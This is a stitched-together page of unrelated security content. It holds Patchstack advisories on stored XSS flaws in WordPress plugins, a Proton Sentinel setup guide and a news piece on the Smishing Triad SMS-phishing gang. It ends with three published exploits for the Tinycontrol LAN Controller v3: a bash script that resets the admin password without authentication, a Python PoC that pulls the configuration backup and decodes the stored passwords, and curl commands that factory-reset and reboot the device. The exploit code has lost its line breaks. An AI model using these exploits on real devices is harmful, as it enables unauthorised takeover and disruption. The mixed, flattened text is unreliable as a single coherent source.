Auth. (admin+) Stored Cross-Site Scripting (XSS) vulnerability in Visualmodo Borderless plugin <= 1.4.8 versions.

**Solution**

 Fixed

Update the WordPress Borderless – Widgets, Elements, Templates and Toolkit for Elementor & Gutenberg plugin to the latest available version (at least 1.4.9).

Found this useful? Thank Rio Darmawan for reporting this vulnerability. Buy a coffee ☕

Rio Darmawan discovered and reported this Cross Site Scripting (XSS) vulnerability in WordPress Borderless – Widgets, Elements, Templates and Toolkit for Elementor & Gutenberg Plugin. This could allow a malicious actor to inject malicious scripts, such as redirects, advertisements, and other HTML payloads into your website which will be executed when guests visit your site. This vulnerability has been fixed in version 1.4.9.

**No other known vulnerabilities for this plugin**Report

**WordPress plugin developer?**

Start a free security program for your WordPress plugins or request an audit.

Apply for MVDP

**Security researcher?**

Report to Patchstack Alliance bounty platform and earn monthly cash prizes.

Learn more

CVE-2023-38518: WordPress Borderless plugin <= 1.4.8 - Cross Site Scripting (XSS) - Patchstack

Auth. (admin+) Stored Cross-Site Scripting (XSS) vulnerability in SuiteDash :: ONE Dashboard® Client Portal : SuiteDash Direct Login plugin <= 1.7.6 versions.

**Solution**

 No fix

No patched version is available.

Found this useful? Thank Rio Darmawan for reporting this vulnerability. Buy a coffee ☕

Rio Darmawan discovered and reported this Cross Site Scripting (XSS) vulnerability in WordPress Client Portal : SuiteDash Direct Login Plugin. This could allow a malicious actor to inject malicious scripts, such as redirects, advertisements, and other HTML payloads into your website which will be executed when guests visit your site. This vulnerability has not been known to be fixed yet.

**No other known vulnerabilities for this plugin**Report

**WordPress plugin developer?**

Start a free security program for your WordPress plugins or request an audit.

Apply for MVDP

**Security researcher?**

Report to Patchstack Alliance bounty platform and earn monthly cash prizes.

Learn more

CVE-2023-38476: WordPress Client Portal : SuiteDash Direct Login plugin <= 1.7.6 - Cross Site Scripting (XSS) - Patchstack

Auth. (admin+) Stored Cross-Site Scripting (XSS) vulnerability in Elastic Email Sender plugin <= 1.2.6 versions.

**Solution**

 Fixed

Update the WordPress Elastic Email Sender plugin to the latest available version (at least 1.2.7).

Found this useful? Thank yuyudhn for reporting this vulnerability. Buy a coffee ☕

yuyudhn discovered and reported this Cross Site Scripting (XSS) vulnerability in WordPress Elastic Email Sender Plugin. This could allow a malicious actor to inject malicious scripts, such as redirects, advertisements, and other HTML payloads into your website which will be executed when guests visit your site. This vulnerability has been fixed in version 1.2.7.

**No other known vulnerabilities for this plugin**Report

**WordPress plugin developer?**

Start a free security program for your WordPress plugins or request an audit.

Apply for MVDP

**Security researcher?**

Report to Patchstack Alliance bounty platform and earn monthly cash prizes.

Learn more

CVE-2023-38387: WordPress Elastic Email Sender plugin <= 1.2.6 - Cross Site Scripting (XSS) - Patchstack

Auth. (admin+) Stored Cross-Site Scripting (XSS) vulnerability in Realwebcare WRC Pricing Tables plugin <= 2.3.7 versions.

**Solution**

 No fix

No patched version is available.

Found this useful? Thank Rio Darmawan for reporting this vulnerability. Buy a coffee ☕

Rio Darmawan discovered and reported this Cross Site Scripting (XSS) vulnerability in WordPress WRC Pricing Tables Plugin. This could allow a malicious actor to inject malicious scripts, such as redirects, advertisements, and other HTML payloads into your website which will be executed when guests visit your site. This vulnerability has not been known to be fixed yet.

**No other known vulnerabilities for this plugin**Report

**WordPress plugin developer?**

Start a free security program for your WordPress plugins or request an audit.

Apply for MVDP

**Security researcher?**

Report to Patchstack Alliance bounty platform and earn monthly cash prizes.

Learn more

CVE-2023-38517: WordPress WRC Pricing Tables plugin <= 2.3.7 - Cross Site Scripting (XSS) - Patchstack

Auth. (admin+) Stored Cross-Site Scripting (XSS) vulnerability in Exifography plugin <= 1.3.1 versions.

**Solution**

 No fix

No patched version available.

Found this useful? Thank Rio Darmawan for reporting this vulnerability. Buy a coffee ☕

Rio Darmawan discovered and reported this Cross Site Scripting (XSS) vulnerability in WordPress Exifography Plugin. This could allow a malicious actor to inject malicious scripts, such as redirects, advertisements, and other HTML payloads into your website which will be executed when guests visit your site. This vulnerability has not been known to be fixed yet.

**No other known vulnerabilities for this plugin**Report

**WordPress plugin developer?**

Start a free security program for your WordPress plugins or request an audit.

Apply for MVDP

**Security researcher?**

Report to Patchstack Alliance bounty platform and earn monthly cash prizes.

Learn more

CVE-2023-38521: WordPress Exifography plugin <= 1.3.1 - Cross Site Scripting (XSS) - Patchstack

If you want the highest possible level of protection, this is it.

There's a constant battle going on between software developers trying to keep their apps and platforms secure, and hackers and malware writers eager to break through those digital defenses. In its quest to offer a more secure and private suite of web apps, security-focused service provider Proton is rolling out a new feature called Proton Sentinel.

If you're new to Proton, the Switzerland-based company offers email, VPN, cloud storage, and various other digital services, with a clear emphasis on security and privacy. It's a bit like Google without the tracking or the ads, and the newly unveiled Proton Sentinel is a “high-security program” for keeping users and their data safe.

It's worth emphasizing that Proton accounts already come with a bunch of security features and protections to keep out bad actors. There's end-to-end, zero-access encryption for user data, there's two-factor authentication to help you prove you are who you say you are when you log in, there's a custom-built spam filtering system, there are real-time notifications of logins, and more.

However, Sentinel goes further. Proton describes the additional feature as offering more protection than most people will need, aimed at “users who need the most security”: Journalists, government officials, religious leaders, and leaders of international peace organizations are mentioned as some of those who are particularly at risk from hacking attempts.

You can enable Sentinel from inside your Proton account.

Proton via David Nield

"Accounts such as these have a high risk of being attacked by criminals or state-backed hackers," writes Proton's Dingchao Lu. “We are now ready to provide the same level of advanced protection and support that we reserved for these VIPs to any Proton user that wants it through the Proton Sentinel program.”

You don't have to fall into one of those categories to use Proton Sentinel, but you do have to be a paying Proton user: a Visionary, Lifetime, Family, Unlimited, or Business plan is required, and you can see details of all the plans here.

A lot of the work that Proton Sentinel does goes on behind the scenes, and you'll find that Proton itself doesn't go into too much detail about how it functions—which is sensible if you want to minimize the chances of someone else getting around it.

The advanced security protection it offers includes strict challenges for “suspicious” login attempts, typically those from devices that you don't normally use and parts of the world that you're not normally in. You might find yourself asked to confirm more of your logins to Proton services with Sentinel enabled, but it's worth it for the extra peace of mind.

Proton says that suspicious logins are flagged by automated systems and then escalated to human security analysts, around the clock. Any support requests you file related to account security will also get escalated to trained security specialists, meaning that if there is a security problem, it's going to be dealt with more quickly.

Related to this stricter policy on logins, Proton Sentinel also gives you access to detailed security logs inside your account, listing attempts to log in using your credentials, as well as other key actions you need to be aware of (such as password changes.)

More detailed security logs are available with Proton Sentinel.

Proton via David Nield

If you're on board with Proton Sentinel and everything that it offers, log into your Proton account on the web. Click the **settings** cogwheel, then **Go to settings**, and then **Security and privacy**: At the top of the screen there should be an **Enable Proton Sentinel** toggle switch that you can turn on. That's all there is to it: You're now protected.

Farther down the same screen is the security logs panel: Turn on both **Enable authentication logs** and **Enable advanced logs** to get all of the information possible about when and where your account is being used. All successful and unsuccessful login attempts are listed here, since the very first day you opened your Proton account—and if security actions were taken on a login attempt, this will be recorded next to it.

If you see something you don't recognize, you can click the **Revoke** button next to an existing session: The device in question will be remotely logged out, and a fresh sign-in will be required to use Proton's apps on that device. It's better to err on the side of caution here, and log out from any sessions that you don't immediately recognize. If you do notice anything suspicious, you should contact Proton Support too.

Proton Sentinel is simple to set up, takes very little effort to maintain, and keeps your Proton account as well protected as possible—so it makes a lot of sense to enable the feature. Like the Enhanced Safety Mode that Google offers as part of Chrome's feature set, Sentinel goes above and beyond the norms to make sure that there's no unauthorized access to your account.

How to Use Proton Sentinel to Keep Your Accounts Safe

By Deeba Ahmed
Smishing Triad Impersonating Leading Mail/Delivery Services in New Attack
This is a post from HackRead.com Read the original post: Chinese Smishing Triad Gang Hits US Users in Extensive Cybercrime Attack

Triad cleverly impersonates postal/delivery services like Royal Mail or USPS to trap unsuspecting US citizens in its newly detected smishing campaign.

Cybersecurity rsearcgers at Resecurity have published an advisory about the newly discovered large-scale smishing campaign from the Chinese-speaking cybercrime group Smishing Triad targeting US-based users through impersonating popular mail and delivery services.

According to Resecurity, Smishing Triad originates from China and uses smishing attacks as its primary attack vector. Researchers found that Smishing Triad has affiliations with several different cybercrime groups and that the group offers cybercrime-as-a-service infrastructure with its Smishing kit subscription starting at $200/month. Subscribers receive activation codes and deployment scripts with different frameworks.

“It is complicated to disrupt cyber-criminal activity committed by actors located in foreign jurisdictions like China without proper regulatory harmonization and mutual legal assistance abroad. Resecurity is thus sharing information about the ‘Smishing Triad’ with the cybersecurity community and general public to raise awareness to help organizations better safeguard their customers,” the advisory read.

**What is a Smishing Attack?**

Smishing (aka SMS Phishing), scammers exploit SMS or text message features and services to trap unsuspecting users into revealing sensitive personal and financial details, including passwords, banking credentials, and debit/credit card numbers, and lure them into downloading malicious software.

Threat actors mimic some credible government or private entity for instance, postal services, government institutions, or banks for creating a sense of legitimacy around these messages. 

**How Does the Attack Occur?**

The group generally exploits iMessage service for sending package-tracking scams, and steals PII (personally identifiable information) and financial data (such as payment card details or banking credentials) to conduct credit card fraud and identity theft.

This time, Smishing Triad has changed its strategy slightly and exploits messages from compromised Apple iCloud accounts to trick users. Its smishing kit is also up for sale on Telegram IM groups to create an extensive and well-organized fraud-as-a-service network.

Resecurity threat intelligence team accessed and reverse-engineered one such kit and discovered an SQL injection vulnerability through which they could retrieve sensitive data of more than 108,000 victims and warned them about the likelihood of identity theft.

**Who are the Targets?**

In this campaign, Smishing Triad is targeting US citizens. The group impersonates most leading postal and delivery services to trick users, including the following:

*   USPS
*   Correos (Spain)
*   New Zealand Post
*   The Royal Mail (UK)
*   Postnord (Sweden)
*   Poczta Polska (Poland)
*   J&T Express (Indonesia)
*   New Zealand Postal Service (NZPOST)
*   Poste Italiane and the Italian Revenue Service (Agenzia delle Entrate)

The victim receives a message from any of these services requesting additional information or payment of delivery fees through a credit card. After obtaining the desired information, the attackers can commit financial fraud.

Phished text – What happens when the phishing link is clicked (Rsecurity)

In its earlier campaigns, the group targeted users from diverse regions such as the UK, Poland, Japan, Indonesia, Sweden, and Italy.

**Protection from Smishing Attacks**

Protecting yourself from smishing (SMS phishing) is important for safeguarding your personal information and financial security. Here are five points to help you stay safe from smishing:

*   **Verify the Sender**: Always verify the sender’s identity before responding to any SMS messages, especially those that ask for personal or financial information. Legitimate organizations usually include their name and contact information in their messages.
*   **Don’t Click on Links**: Avoid clicking on links or downloading attachments in text messages, especially if you didn’t expect to receive such a message. These links may lead to malicious websites or install malware on your device.
*   **Be Cautious with Personal Information**: Never share personal or financial information via text messages, such as Social Security numbers, credit card details, or login credentials. Legitimate organizations will not ask for such sensitive data through SMS.
*   **Use Trusted Sources**: If you receive an SMS claiming to be from a bank, government agency, or other official institution, don’t trust it blindly. Instead, contact the organization directly using a trusted phone number or website to verify the message’s authenticity.
*   **Install Security Software**: Use reputable antivirus and anti-malware software on your mobile device. These tools can help detect and block malicious SMS messages and links.

Additionally, keeping your phone’s operating system and apps up-to-date, using strong and unique passwords for your accounts, and enabling two-factor authentication wherever possible can further enhance your protection against smishing and other cyber threats.

Chinese Smishing Triad Gang Hits US Users in Extensive Cybercrime Attack

Tinycontrol LAN Controller version 3 suffers from an insecure access control allowing an unauthenticated attacker to change accounts passwords and bypass authentication gaining panel control access.

    #!/bin/bash: "Tinycontrol LAN Controller v3 (LK3) Remote Admin Password ChangeVendor: TinycontrolProduct web page: https://www.tinycontrol.plAffected version: <=1.58a, HW 3.8Summary: Lan Controller is a very universaldevice that allows you to connect many differentsensors and remotely view their readings andremotely control various types of outputs.It is also possible to combine both functionsinto an automatic if -> this with a calendarwhen -> then. The device provides a user interfacein the form of a web page. The website presentsreadings of various types of sensors: temperature,humidity, pressure, voltage, current. It alsoallows you to configure the device, incl. eventsetting and controlling up to 10 outputs. Thanksto the support of many protocols, it is possibleto operate from smartphones, collect and observthe results on the server, as well as cooperationwith other I/O systems based on TCP/IP and Modbus.Desc: The application suffers from an insecure accesscontrol allowing an unauthenticated attacker tochange accounts passwords and bypass authenticationgaining panel control access.Tested on: lwIPVulnerability discovered by Gjoko 'LiquidWorm' Krstic                            @zeroscienceAdvisory ID: ZSL-2023-5787Advisory ID: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5787.php18.08.2023"set -euo pipefailIFS=$'\n\t'if [ $# -ne 2 ]; then    echo -ne '\nUsage: $0 [ipaddr] [desired admin pwd]\n\n'    exitfiIP=$1PW=$2EN=$(echo -n $PW | base64)curl -s http://$IP/stm.cgi?auth=00YWRtaW4=*$EN*dXNlcg==*dXNlcg==# ?auth=00 (disable authentication, disable upgrade), https://docs.tinycontrol.pl/en/lk3/api/access/echo -ne '\nAdmin password changed to: '$PW

Tinycontrol LAN Controller 3 Remote Admin Password Change

Tinycontrol LAN Controller version 3 suffers from an issue where an unauthenticated attacker can retrieve the controller's configuration backup file and extract sensitive information that can allow him/her/them to bypass security controls and penetrate the system in its entirety.

    #!/usr/bin/env python### Tinycontrol LAN Controller v3 (LK3) Remote Credentials Extraction PoC### Vendor: Tinycontrol# Product web page: https://www.tinycontrol.pl# Affected version: <=1.58a, HW 3.8## Summary: Lan Controller is a very universal# device that allows you to connect many different# sensors and remotely view their readings and# remotely control various types of outputs.# It is also possible to combine both functions# into an automatic if -> this with a calendar# when -> then. The device provides a user interface# in the form of a web page. The website presents# readings of various types of sensors: temperature,# humidity, pressure, voltage, current. It also# allows you to configure the device, incl. event# setting and controlling up to 10 outputs. Thanks# to the support of many protocols, it is possible# to operate from smartphones, collect and observ# the results on the server, as well as cooperation# with other I/O systems based on TCP/IP and Modbus.## Desc: An unauthenticated attacker can retrieve the# controller's configuration backup file and extract# sensitive information that can allow him/her/them# to bypass security controls and penetrate the system# in its entirety.## Tested on: lwIP### Vulnerability discovered by Gjoko 'LiquidWorm' Krstic#                             @zeroscience### Advisory ID: ZSL-2023-5786# Advisory ID: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5786.php### 18.08.2023##import subprocessimport requestsimport base64import sysbinb = "lk3_settings.bin"outf = "lk3_settings.enc"bpatt = "0upassword"epatt = "pool.ntp.org"startf = Falseendf = Falseextral = []print("""    O`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'O    |                                          |    |     Tinycontrol LK3 1.58 Settings DL     |    |              ZSL-2023-5786               |    |         2023 (c) Zero Science Lab        |    |                                          |    |`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'|    |                                          |""")if len(sys.argv) != 2:    print("[?] Vaka: python {} ipaddr:port".format(sys.argv[0]))    exit(-0)else:    rhost=sys.argv[1]    if not "http" in rhost:        rhost="http://{}".format(rhost)try:    resp = requests.get(rhost + "/" + binb)    if resp.status_code == 200:        with open(outf, 'wb') as f:            f.write(resp.content)        print(f"[*] Got data as {outf}")    else:        print(f"[!] Backup failed. Status code: {resp.status_code}")except Exception as e:    print("[!] Error:", str(e))    exit(-1)binf = outfsout = subprocess.check_output(["strings", binf], universal_newlines = True)linea = sout.split("\n")for thricer in linea:    if bpatt in thricer:        startf = True    elif epatt in thricer:        endf = True    elif startf and not endf:        extral.append(thricer)if len(extral) >= 4:    userl = extral[1].strip()    adminl = extral[3].strip()    try:        decuser = base64.b64decode(userl).decode("utf-8")        decadmin = base64.b64decode(adminl).decode("utf-8")        print("[+] User password:", decuser)        print("[+] Admin password:", decadmin)    except Exception as e:        print("[!] Error decoding:", str(e))else:    print("[!] Regex failed.")    exit(-2)

Tinycontrol LAN Controller 3 Remote Credential Extraction

Tinycontrol LAN Controller version 3 suffers from an unauthenticated remote denial of service vulnerability. An attacker can issue direct requests to the stm.cgi page to reboot and also reset factory settings on the device.

    Tinycontrol LAN Controller v3 (LK3) Remote Denial Of Service ExploitVendor: TinycontrolProduct web page: https://www.tinycontrol.plAffected version: <=1.58a, HW 3.8Summary: Lan Controller is a very universaldevice that allows you to connect many differentsensors and remotely view their readings andremotely control various types of outputs.It is also possible to combine both functionsinto an automatic if -> this with a calendarwhen -> then. The device provides a user interfacein the form of a web page. The website presentsreadings of various types of sensors: temperature,humidity, pressure, voltage, current. It alsoallows you to configure the device, incl. eventsetting and controlling up to 10 outputs. Thanksto the support of many protocols, it is possibleto operate from smartphones, collect and observthe results on the server, as well as cooperationwith other I/O systems based on TCP/IP and Modbus.Desc: The controller suffers from an unauthenticatedremote denial of service vulnerability. An attackercan issue direct requests to the stm.cgi page toreboot and also reset factory settings on the device.Tested on: lwIPVulnerability discovered by Gjoko 'LiquidWorm' Krstic                            @zeroscienceAdvisory ID: ZSL-2023-5785Advisory ID: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5785.php18.08.2023--$ curl http://192.168.1.1:8082/stm.cgi?eeprom_reset=1 # restore default settings$ curl http://192.168.1.1:8082/stm.cgi?lk3restart=1   # reboot controller

Tag

#web